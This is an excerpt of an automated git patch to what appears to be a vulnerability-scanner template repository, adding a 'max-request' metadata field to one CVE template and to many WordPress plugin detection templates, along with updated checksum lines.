+http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50 +http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848 +http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69 @@ -7049,7 +7050,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:c9397bfe7331e6073a54092c3c9978ac5484cbe8 +templates-checksum.txt:1ca9a31f1872bde0774cf99809d548e12cffe794 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 658476e59128862476450e7ebebf4f93757ae82d Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 8 Sep 2023 06:30:10 +0000 Subject: [PATCH 0219/1090] TemplateMan Update [Fri Sep 8 06:30:10 UTC 2023] :robot: --- http/cve/2023/CVE-2023-38433.yaml | 1 + http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/astra-widgets.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-and-footer-scripts.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/iwp-client.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + http/technologies/wordpress/plugins/loginpress.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-builder.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/use-any-font.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + .../technologies/wordpress/plugins/velvet-blues-update-urls.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 202 files changed, 202 insertions(+) diff --git a/http/cve/2023/CVE-2023-38433.yaml b/http/cve/2023/CVE-2023-38433.yaml index 37d1a7144a..4cd377a030 100644 --- a/http/cve/2023/CVE-2023-38433.yaml +++ b/http/cve/2023/CVE-2023-38433.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-798 metadata: max-req: 1 + max-request: 2 shodan-query: '"Server: thttpd/2.25b 29dec2003" content-length:1133' verified: true tags: cve,cve2023,fujitsu,ip-series diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7cbd1855ae..ebb5ba1042 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: + max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 8d579ff23d..fddfbf3118 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: + max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4a6d8b7bbe..7a6e8a76ec 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: + max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e4eb308d39..940c0e614c 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: + max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 97f1d8c18f..06cfd4950b 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: + max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 10f104f2c7..90aa5881fd 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: + max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 8addc28ded..1bf337da6c 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: + max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 2e579621ac..7cec152555 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 41e297ffeb..8a4b6133cd 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 0dd8686ec3..cfa2e3d080 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: + max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 359671f3bd..a92d9bde4e 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: + max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 116e0c420a..59144c7dd5 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: + max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index dc4703ef8d..df06ba2f35 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: + max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 1426ac3ef2..2a79d529cc 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: + max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 78d1651ff4..556a113acc 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: + max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index f7219b373d..58d9a9d738 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: + max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index f688a68f72..6c9c485079 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: + max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 00e95c4263..7631e87d78 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: + max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 212b2b13c4..c7daa26ac6 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: + max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 6318392c5c..68767e4dce 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: + max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index e1a2a186e0..073618936d 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: + max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 23614882a7..6aabc19e9f 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: + max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 85965337cb..ac80e4f31b 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: + max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 33d903a1b4..15d7a24755 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: + max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 3c6f8f287b..40ccc15b27 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: + max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index c3b630cde2..1fad3cee08 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: + max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 5c8ce709b6..ebe4ee41a7 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: + max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index aea47b9e84..5c32110e0e 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: + max-request: 1 plugin_namespace: code-snippets wpscan: 